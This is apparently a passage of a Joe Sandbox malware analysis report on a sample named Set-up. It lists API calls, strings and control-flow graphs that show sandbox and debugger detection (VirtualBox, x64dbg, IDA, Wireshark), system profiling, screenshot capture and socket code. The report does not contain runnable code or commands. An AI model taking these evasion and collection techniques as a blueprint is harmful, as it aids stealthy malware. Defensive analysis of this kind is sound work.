                            • WSAGetLastError.WS2_32 ref: 0083ADF5
                            • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 0083AE9D
                            • htons.WS2_32(?), ref: 0083AEDB
                            • bind.WS2_32(?,00000002,00000010), ref: 0083AEF5
                            • WSAGetLastError.WS2_32 ref: 0083AFB9
                            • htons.WS2_32(?), ref: 0083AFFC
                            • bind.WS2_32(?,?,?), ref: 0083B014
                            • WSAGetLastError.WS2_32 ref: 0083B056
                            • htons.WS2_32(?), ref: 0083B0D2
                            • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 0083B0EA
                            Strings
                            • @, xrefs: 0083A8F4
                            • Local Interface %s is ip %s using address family %i, xrefs: 0083AE60
                            • cf-socket.c, xrefs: 0083A5CD, 0083A735
                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0083A6CE
                            • Bind to local port %d failed, trying next, xrefs: 0083AFE5
                            • Local port: %hu, xrefs: 0083AF28
                            • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0083AD0A
                            • Trying [%s]:%d..., xrefs: 0083A689
                            • bind failed with errno %d: %s, xrefs: 0083B080
                            • Couldn't bind to '%s' with errno %d: %s, xrefs: 0083AE1F
                            • cf_socket_open() -> %d, fd=%d, xrefs: 0083A796
                            • @, xrefs: 0083AC42
                            • Could not set TCP_NODELAY: %s, xrefs: 0083A871
                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 0083ADAC
                            • Trying %s:%d..., xrefs: 0083A7C2, 0083A7DE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                            • API String ID: 2815861332-2373386790
                            • Opcode ID: 669e06ab8ec716914311125ee5476f3e00becf10a667b133595bb4837a5cea10
                            • Instruction ID: 6d645f98e4e0798d4a06bd4651950414e7194a1a334887648e01b6626d5eb579
                            • Opcode Fuzzy Hash: 669e06ab8ec716914311125ee5476f3e00becf10a667b133595bb4837a5cea10
                            • Instruction Fuzzy Hash: 4362E171508340ABE7288F24C846BAAB7E8FFD5314F044529F988D7292E771E985CBD3

                            Control-flow Graph

                            APIs
                            • FindFirstFileA.KERNELBASE ref: 00802A27
                            • RegOpenKeyExA.KERNELBASE ref: 00802A8A
                            • CharUpperA.USER32 ref: 00802AEF
                            • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00802B05
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00802B6D
                            • Process32First.KERNEL32 ref: 00802B88
                            • Process32Next.KERNEL32 ref: 00802BC0
                            • QueryFullProcessImageNameA.KERNELBASE ref: 00802C26
                            • CloseHandle.KERNELBASE ref: 00802C49
                            • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00802C5F
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00802CC4
                            • Process32First.KERNEL32 ref: 00802CDF
                            • strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00802D0D
                            • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00802D42
                            • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00802D5C
                            • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00802D76
                            • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00802D90
                            • Process32Next.KERNEL32 ref: 00802DBF
                            • CloseHandle.KERNELBASE ref: 00802DFC
                            • EnumWindows.USER32 ref: 00802E21
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
                            • String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
                            • API String ID: 515599682-3783588604
                            • Opcode ID: 312c5fe4ead15b17354f30b249a58009b74b4dcc94b13a4fee97a619f856d42b
                            • Instruction ID: 4b09a74185cad76e605cb3c6e4ba120ffbf5c20fe00ca21a93d6dcb65a9470e9
                            • Opcode Fuzzy Hash: 312c5fe4ead15b17354f30b249a58009b74b4dcc94b13a4fee97a619f856d42b
                            • Instruction Fuzzy Hash: 65E1F5B49053099FCB50EF69D98969DBBF4EF45304F4088A9E888DB390E774D989CF42

                            Control-flow Graph

                            APIs
                            • GetSystemInfo.KERNELBASE ref: 00802579
                              • Part of subcall function 00C929F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00802589), ref: 00C92A05
                            • GlobalMemoryStatusEx.KERNELBASE ref: 008025CC
                            • GetLogicalDriveStringsA.KERNEL32 ref: 00802619
                            • GetDriveTypeA.KERNELBASE ref: 00802647
                            • GetDiskFreeSpaceExA.KERNELBASE ref: 0080267E
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00802749
                            • KiUserCallbackDispatcher.NTDLL ref: 008027E2
                            • SHGetKnownFolderPath.SHELL32 ref: 0080286D
                            • wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 008028BE
                            • wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 008028D4
                            • FindFirstFileW.KERNELBASE ref: 008028F8
                            • FindNextFileW.KERNELBASE ref: 0080291F
                            • K32EnumProcesses.KERNEL32 ref: 0080296F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
                            • String ID: @$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
                            • API String ID: 2116500361-3337672980
                            • Opcode ID: c9b468900dbe4f6f4b8d64a0c6cd631d030c36e25311cd5168c0f5e5f50e9616
                            • Instruction ID: ae0371905a61bdc713c915053eb3fd66949015a49f0894e6cc79f9b0dbf63e6a
                            • Opcode Fuzzy Hash: c9b468900dbe4f6f4b8d64a0c6cd631d030c36e25311cd5168c0f5e5f50e9616
                            • Instruction Fuzzy Hash: F2D1D7B49053089FCB50EF68C98569EBBF0FF44344F008969E898E7351E7749A85DF92

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNEL32 ref: 00B98DCF
                            • GetProcAddress.KERNEL32 ref: 00B98DF3
                            • GetProcAddress.KERNEL32 ref: 00B98E09
                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B98FEF
                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B99010
                            • FreeLibrary.KERNEL32 ref: 00B99018
                              • Part of subcall function 00B97E20: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B97E6D
                              • Part of subcall function 00B97E20: wcscmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00B97EB6
                              • Part of subcall function 00B97E20: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B97ED8
                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B99097
                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B990B8
                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B990CF
                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B990F0
                            • FreeLibrary.KERNEL32 ref: 00B990F8
                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B99117
                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B99138
                            • FreeLibrary.KERNEL32 ref: 00B99140
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: Library__acrt_iob_funcfwrite$Free$AddressProc$Loadfreemallocwcscmp
                            • String ID: !$Failed to allocate buffer$Failed to create GDI+ bitmap$Failed to get JPEG encoder CLSID$Failed to load GDI+ functions$Failed to load gdiplus.dll$GdipCreateBitmapFromHBITMAP$GdipSaveImageToStream$gdiplus.dll$image/jpeg
                            • API String ID: 4185073593-1943330374
                            • Opcode ID: 21efdb078e5f3491e7945f6f48913a9c24bd23bb4156ed7a38e7834205dff9c5
                            • Instruction ID: 6c4d7b1371486aa161b42071e87b8b0fa6910572c11e17005132d7dfea1b87f0
                            • Opcode Fuzzy Hash: 21efdb078e5f3491e7945f6f48913a9c24bd23bb4156ed7a38e7834205dff9c5
                            • Instruction Fuzzy Hash: EB5143B49093049FDB50AF69D84835EBBF0FF85314F0188ADE89897251EB799889CF43

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 950 8caa30-8caa64 952 8caa6a-8caaa7 call 8be730 950->952 953 8cab04-8cab09 950->953 957 8cab0e-8cab13 952->957 958 8caaa9-8caabd 952->958 955 8cae80-8cae89 953->955 961 8cae2e 957->961 959 8caabf-8caac7 958->959 960 8cab18-8cab50 htons 958->960 959->961 963 8caacd-8cab02 htons 959->963 964 8cab58-8cab6d 960->964 962 8cae30-8cae4a call 8bea60 call 8bebf0 961->962 980 8cae4c-8cae57 962->980 981 8cae75-8cae7d 962->981 963->964 965 8cab6f-8cab73 964->965 966 8cab96-8cabab socket 964->966 965->966 968 8cab75-8cab8f 965->968 966->961 970 8cabb1-8cabc5 966->970 968->970 979 8cab91 968->979 972 8cabc7-8cabca 970->972 973 8cabd0-8cabed ioctlsocket 970->973 972->973 976 8cad2e-8cad39 972->976 977 8cabef-8cac0a setsockopt 973->977 978 8cac10-8cac14 973->978 982 8cad3b-8cad4c 976->982 983 8cad52-8cad56 976->983 977->978 984 8cae29 977->984 985 8cac16-8cac31 setsockopt 978->985 986 8cac37-8cac41 978->986 979->961 987 8cae6e-8cae6f closesocket 980->987 988 8cae59-8cae5e 980->988 981->955 982->983 982->984 983->984 989 8cad5c-8cad6b 983->989 984->961 985->984 985->986 990 8cac7a-8cac7e 986->990 991 8cac43-8cac46 986->991 987->981 988->987 995 8cae60-8cae6c 988->995 997 8cad70-8cad78 989->997 993 8cace7-8cacfe setsockopt 990->993 994 8cac80-8cac9b 990->994 998 8cac4c-8cac51 991->998 999 8cad04-8cad08 991->999 993->999 994->993 1000 8cac9d-8cacc1 994->1000 995->981 1002 8cad7a-8cad7f 997->1002 1003 8cada0-8cadad connect 997->1003 998->999 1004 8cac57-8cac78 htonl 998->1004 999->976 1001 8cad0a-8cad28 setsockopt 999->1001 1006 8cacc6-8cacd7 bind 1000->1006 1001->976 1001->984 1002->1003 1005 8cad81-8cad99 1002->1005 1007 8cadb3-8cadcf WSAGetLastError 1003->1007 1004->1006 1005->1007 1006->984 1009 8cacdd-8cace5 1006->1009 1010 8cae8a-8cae91 1007->1010 1011 8cadd5-8cadd8 1007->1011 1009->993 1009->999 1010->962 1013 8cadda-8caddf 1011->1013 1014 8cade1-8cadf1 1011->1014 1013->997 1013->1014 1015 8cae0d-8cae12 1014->1015 1016 8cadf3-8cae07 1014->1016 1017 8cae1a-8cae1c call 8caf70 1015->1017 1018 8cae14-8cae17 1015->1018 1016->1015 1021 8caea8-8caead 1016->1021 1022 8cae21-8cae23 1017->1022 1018->1017 1021->962 1023 8cae25-8cae27 1022->1023 1024 8cae93-8cae9d 1022->1024 1023->962 1025 8caeaf-8caeb1 call 8be760 1024->1025 1026 8cae9f-8caea6 call 8be7c0 1024->1026 1030 8caeb6-8caebe 1025->1030 1026->1030 1031 8caf1a-8caf1f 1030->1031 1032 8caec0-8caedb call 8be180 1030->1032 1031->962 1032->962 1035 8caee1-8caeec 1032->1035 1036 8caeee-8caeff 1035->1036 1037 8caf02-8caf06 1035->1037 1036->1037 1038 8caf0e-8caf15 1037->1038 1039 8caf08-8caf0b 1037->1039 1038->955 1039->1038
                            APIs
                            • htons.WS2_32(?), ref: 008CAAE8
                            • htons.WS2_32(?), ref: 008CAB33
                            • socket.WS2_32(FFFFFFFF,?,00000000), ref: 008CAB9A
                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 008CABE3
                            • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 008CAC02
                            • setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 008CAC29
                            • htonl.WS2_32(00000000), ref: 008CAC69
                            • bind.WS2_32(?,00000017,0000001C), ref: 008CACCF
                            • setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 008CACFE
                            • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 008CAD20
                            • WSAGetLastError.WS2_32 ref: 008CADB5
                            • closesocket.WS2_32(?), ref: 008CAE6F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
                            • String ID:
                            • API String ID: 4039825230-0
                            • Opcode ID: e17a24c34962e2ad6b6f9081a72b12dc86038650abc39d9537401a5f70a0e5f1
                            • Instruction ID: 9e74626d3ec0baa6989b69a94f2f9c85d93805c1750bb07e29b20d4f57b2b6d8
                            • Opcode Fuzzy Hash: e17a24c34962e2ad6b6f9081a72b12dc86038650abc39d9537401a5f70a0e5f1
                            • Instruction Fuzzy Hash: 67E1AD746003099FEB288F24D884F6AB7B5FF88318F044A2CF999DB291D775D944CB92

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1041 80116c-80118a 1042 801430-801439 GetStartupInfoA 1041->1042 1043 801190-8011a1 1041->1043 1047 801448-80145d _cexit 1042->1047 1044 8011bc-8011c8 1043->1044 1045 8011a8-8011aa 1044->1045 1046 8011ca-8011d4 1044->1046 1050 8013d0-8013dd 1045->1050 1051 8011b0-8011b9 Sleep 1045->1051 1048 8013e3-8013f7 call b88a20 1046->1048 1049 8011da-8011e1 1046->1049 1055 8013fd-80141d _initterm 1048->1055 1056 8011ff-801201 1048->1056 1052 801460-801479 _initterm 1049->1052 1053 8011e7-8011f9 1049->1053 1050->1048 1050->1049 1051->1044 1060 801483 1052->1060 1053->1055 1053->1056 1058 801423-801429 1055->1058 1059 801207-80120e 1055->1059 1056->1058 1056->1059 1058->1059 1061 801210-801229 1059->1061 1062 80122c-80126c call b893e0 SetUnhandledExceptionFilter _set_invalid_parameter_handler call b89210 __p__acmdln 1059->1062 1063 80148a-801499 exit 1060->1063 1061->1062 1069 801281-801287 1062->1069 1070 80126e 1062->1070 1071 801270-801272 1069->1071 1072 801289-801294 1069->1072 1073 8012bd-8012c5 1070->1073 1075 801274-801277 1071->1075 1076 8012b8 1071->1076 1074 80127e 1072->1074 1077 8012c7-8012d0 1073->1077 1078 8012db-8012fa malloc 1073->1078 1074->1069 1082 8012a0-8012a2 1075->1082 1083 801279 1075->1083 1076->1073 1079 8013c0-8013c4 1077->1079 1080 8012d6 1077->1080 1078->1060 1081 801300-801311 1078->1081 1079->1080 1080->1078 1085 801318-80134c strlen malloc memcpy 1081->1085 1082->1076 1084 8012a4 1082->1084 1083->1074 1086 8012a8-8012b1 1084->1086 1085->1085 1087 80134e-80139b call b89060 call c986d0 1085->1087 1086->1076 1088 8012b3-8012b6 1086->1088 1087->1063 1093 8013a1-8013a9 1087->1093 1088->1076 1088->1086 1093->1047 1094 8013af-8013ba 1093->1094
                            APIs
                            • Sleep.KERNEL32 ref: 008011B7
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00801238
                            • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080124D
                            • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00801261
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008012EB
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00801323
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0080132E
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00801344
                            • GetStartupInfoA.KERNEL32 ref: 00801433
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
                            • String ID:
                            • API String ID: 3873122205-0
                            • Opcode ID: 3132690e242c9e30c6182f67b1c2dd231f287c36a77b604daec4a31191664e4d
                            • Instruction ID: b580eab86eeab4de5fe9a27c219f6241d3273e649e1a66761edb9bb4a7813b3b
                            • Opcode Fuzzy Hash: 3132690e242c9e30c6182f67b1c2dd231f287c36a77b604daec4a31191664e4d
                            • Instruction Fuzzy Hash: 86819DB1A083088FDF54EF65ED893697BE1FB44314F00442DD985EB3A1DB75A849CB82

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1202 b88e90-b88eb8 _open 1203 b88eba-b88ec7 1202->1203 1204 b88eff-b88f2c call b89f70 1202->1204 1205 b88ec9 1203->1205 1206 b88ef3-b88efa _exit 1203->1206 1213 b88f39-b88f51 _write 1204->1213 1208 b88ecb-b88ecd 1205->1208 1209 b88ee2-b88ef1 1205->1209 1206->1204 1211 c9a6b0-c9a6c7 1208->1211 1212 b88ed3-b88ed6 1208->1212 1209->1205 1209->1206 1216 c9a6c9 1211->1216 1217 c9a6ca-c9a6ff CryptAcquireContextA 1211->1217 1212->1209 1218 b88ed8 1212->1218 1214 b88f30-b88f37 1213->1214 1215 b88f53-b88f5e _close 1213->1215 1214->1213 1214->1215 1215->1203 1219 c9a719-c9a73b CryptGenRandom 1217->1219 1220 c9a701-c9a70f 1217->1220 1218->1209 1222 c9a73d-c9a744 1219->1222 1223 c9a746-c9a75b CryptReleaseContext 1219->1223 1221 c9a715-c9a718 1220->1221 1222->1223 1224 c9a75d-c9a772 CryptReleaseContext 1222->1224 1223->1220 1224->1221
                            APIs
                            • _open.MSVCRT ref: 00B88EAD
                            • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B88EFA
                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B88F4A
                            • _close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B88F59
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _close_exit_open_write
                            • String ID: terminated$@$CONOUT$
                            • API String ID: 28676597-491099378
                            • Opcode ID: dc761a054bbea0350f80fc633b0e6d14a4ab917ceb03d89cc17d060133deda80
                            • Instruction ID: 16c03499dbfb2985318d200d33d497a96f08b3f041744cbd3374c92cdee7291d
